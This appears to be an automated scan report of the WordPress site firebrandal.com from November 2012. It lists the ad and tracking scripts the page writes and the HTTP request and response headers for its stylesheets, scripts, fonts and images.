</script><script type="text/javascript">LJT_Ads.servingPassback();</script><script type="text/javascript">var ljt_beacon = "<div id='beacon_14171' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap5iad3.lijit.com/www/delivery/lg.php?LJT_REQUEST_INFO&amp;zoneid=153334&amp;tid=153334_13521348357770db92221bcae&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;cb=1cce5bf923' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"; ljt_beacon = ljt_beacon.replace("LJT_REQUEST_INFO", ljt_beacon_vals[153334]); document.write(ljt_beacon);</script><script language="JavaScript">function showPremiumAds153334(){var e = document.getElementById("lwp_ad_item_premium_153334"); if (e) { e.style.display="block"; return; }  var i = 0; var w = parent; while (i < 10 && w != null) { var e = w.document.getElementById("lwp_ad_item_premium_153334"); if (e != null ) { e.style.display="block"; i = 10; } ; if (w == self) { i = 10; } else { w = w.parent }; i++; }} showPremiumAds153334(); var lijit_ad_id = "lijit_text_ad_link_txt"; var lijit_text_ad_link = document.getElementById(lijit_ad_id); if (lijit_text_ad_link != null) { lijit_text_ad_link.target = "_blank";} var lijit_text_ad_container = document.getElementById("lijit_text_ad_container"); </script>

#17 JavaScript::Write (size: 105, repeated: 2)

<script>google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);</script>

#18 JavaScript::Write (size: 1014, repeated: 1)

<span><script type='text/javascript'><!--// <![CDATA[
/* openads=http://delivery.switchadhub.com/adserver/www/delivery bannerid=6355 zoneid=6110 source= */
// ]]> --></script><script type="text/javascript"><!--
google_ad_client = "ca-pub-3515913239267445";
/* Media Strike House Campaign - 300x250 */
google_ad_slot = "6323475569";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script><script type='text/javascript' src='http://delivery.switchadhub.com/adserver/www/delivery/ag.php'></script></span><div id='beacon_1e4683455b' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://delivery.switchadhub.com/adserver/www/delivery/lg.php?bannerid=6355&amp;campaignid=1822&amp;zoneid=6110&amp;OACBLOCK=86400&amp;OACCAP=2&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;cb=1e4683455b&amp;tc=1352134836.9167' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

#19 JavaScript::Write (size: 862, repeated: 1)

<style>#lwp_ad_item_premium_153334{	display:none;	position:relative;	width:728px;}#lwp_ad_item_premium_153334>div{}#lwp_adchoices_153334{	display:none;	position:absolute;	right:0px;	top:0px;	z-index:1;	background-color:transparent;	height:16px;	overflow:none;}#lwp_adchoices_153334 img{	border:0px;}</style><div id="lwp_abf_153334"></div><div id="lwp_ad_item_premium_153334"><div><script type='text/javascript' src='http://apr.lijit.com///www/delivery/ajs.php?zoneid=153334&amp;username=firebrandal&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_153334&amp;abf=true&amp;tid=153334_13521348357770db92221bcae&amp;lijit_kw=&amp;cb=25247214689&amp;flv=10.0.45&amp;time=18:00:35&amp;ifr=0&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;od=firebrandal.com'></script></div></div><script type='text/javascript'>LJT_Ads.init(); LJT_Ads.fixBeacons(document.body);</script>


HTTP Transactions (181)


Request Response
GET /button/buttons.js HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/0.8.53
Expires: Tue, 06 Nov 2012 16:22:12 GMT
Cache-Control: max-age=86400
Content-Encoding: gzip
Content-Length: 26061
Date: Mon, 05 Nov 2012 17:00:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /css?family=OFL+Sorts+Mill+Goudy+TT:regular,italic HTTP/1.1

Host: fonts.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Expires: Mon, 05 Nov 2012 17:00:30 GMT
Date: Mon, 05 Nov 2012 17:00:30 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Content-Length: 323
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /css?family=Droid+Serif:r,b,i,bi|Droid+Sans:r,b HTTP/1.1

Host: fonts.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Expires: Mon, 05 Nov 2012 17:00:30 GMT
Date: Mon, 05 Nov 2012 17:00:30 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Content-Length: 496
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /delivery/fp?u=firebrandal&z=153334&n=1 HTTP/1.1

Host: www.lijit.com
GET /delivery/fp?u=firebrandal&amp;z=153334&amp;n=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: PWS/8.0.9.6
X-Px: ms h0-s1017.p7-fra ( fra-tel-n35), ht fra-tel-n35.panthercdn.com
Cache-Control: max-age=7200
Expires: Mon, 05 Nov 2012 17:30:39 GMT
Age: 5391
Content-Length: 6889
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: keep-alive
GET / HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 17:00:29 GMT
Server: Apache
X-Pingback: http://firebrandal.com/xmlrpc.php
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wp-content/plugins/podlove-web-player/podlove-web-player.css?ver=3.4.2 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Fri, 05 Oct 2012 14:18:04 GMT
Etag: &quot;2d96438-897-4cb508a420130&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 762
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/themes/editorial/style.css HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Tue, 22 May 2012 15:01:57 GMT
Etag: &quot;6b9f51-f433-4c0a14cd12592&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 12786
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/plugins/wp-polls/polls-css.css?ver=2.63 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Tue, 12 Jun 2012 14:57:31 GMT
Etag: &quot;5a267df-b0a-4c247af9c7270&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 732
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/plugins/add-to-any/addtoany.min.css?ver=1.4 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Thu, 05 Jul 2012 14:04:44 GMT
Etag: &quot;5f65919-1e7-4c415a12c3940&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 255
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/plugins/podlove-web-player/mediaelement/mediaelementplayer.css?ver=3.4.2 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Fri, 05 Oct 2012 14:18:04 GMT
Etag: &quot;6dda3d-5068-4cb508a403bf5&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3258
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2012 15:03:41 GMT
Etag: &quot;52c7d2f-27f7-4c2841f2c2567&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3949
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/plugins/podcasting/player/audio-player-noswfobject.js?ver=2.0 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Sat, 21 Aug 2010 22:18:40 GMT
Etag: &quot;37fe13-4c3-48e5ccc25b000&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 667
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /?woo-slides-css=load&ver=3.4.2 HTTP/1.1

Host: firebrandal.com
GET /?woo-slides-css=load&amp;ver=3.4.2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
X-Pingback: http://firebrandal.com/xmlrpc.php
Accept-Ranges: none
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 116
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/plugins/podlove-web-player/libs/jquery.ba-hashchange.min.js?ver=1.3.0 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Fri, 05 Oct 2012 14:18:04 GMT
Etag: &quot;6dda38-5f6-4cb508a3fe9f2&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 853
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/plugins/podlove-web-player/podlove-web-player.js?ver=1.1.2 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Fri, 05 Oct 2012 14:18:04 GMT
Etag: &quot;2d96435-1f4d-4cb508a41d25c&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2642
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/plugins/podlove-web-player/mediaelement/mediaelement-and-player.min.js?ver=2.9.1 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Fri, 05 Oct 2012 14:18:04 GMT
Etag: &quot;6dda3a-ebea-4cb508a400d17&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 16299
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/themes/editorial/includes/js/superfish.js?ver=3.4.2 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:06:07 GMT
Etag: &quot;4c08541-ad2-4bc41892f6ab7&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1150
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-includes/js/jquery/jquery.js?ver=1.7.2 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2012 15:03:38 GMT
Etag: &quot;257ff7a-1728d-4c2841f00bc7d&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 33629
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/themes/editorial/includes/js/slides.min.jquery.js?ver=3.4.2 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:06:07 GMT
Accept-Ranges: none
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2371
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/themes/editorial/styles/default.css HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:05:15 GMT
Etag: &quot;47cf700-12-4bc41861b21da&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 38
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/uploads/2012/02/logo_fin2.png HTTP/1.1

Host: www.firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:11:14 GMT
Etag: &quot;2a0200a-c5bd-4bc419b7ea49d&quot;
Accept-Ranges: bytes
Content-Length: 50621
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/themes/editorial/custom.css HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 13:05:32 GMT
Etag: &quot;6b9f43-16e-4bd7b02cfa012&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 257
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/css/shortcodes.css HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Last-Modified: Wed, 02 May 2012 14:54:33 GMT
Etag: &quot;3d81a14-6d95-4bf0edd7ebb99&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4649
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/04/quick_post.jpg&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/04/quick_post.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:31 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:31 GMT
Content-Length: 7608
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/vote2.jpg&w=291&h=120&zc=1&q=90&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/vote2.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 400 Bad Request

Content-Type: text/html
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm4.staticflickr.com/3069/2752005468_ab3d308a85_b.jpg&w=291&h=120&zc=1&q=90&a=t HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm4.staticflickr.com/3069/2752005468_ab3d308a85_b.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90&amp;a=t HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:31 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:31 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:31 GMT
Content-Length: 5810
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/6.jpg&w=940&h=&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/6.jpg&amp;w=940&amp;h=&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:31 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:31 GMT
Content-Length: 53838
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm7.staticflickr.com/6083/6113012364_c599d050eb.jpg&w=940&h=&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm7.staticflickr.com/6083/6113012364_c599d050eb.jpg&amp;w=940&amp;h=&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:30 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:30 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:30 GMT
Content-Length: 186938
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /p?c1=8&c2=3005693&c3=102&c4=&c5=&c6=&c15=&cv=2.0&cj=1&ljt_r=739317457 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=3005693&amp;c3=102&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;ljt_r=739317457 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
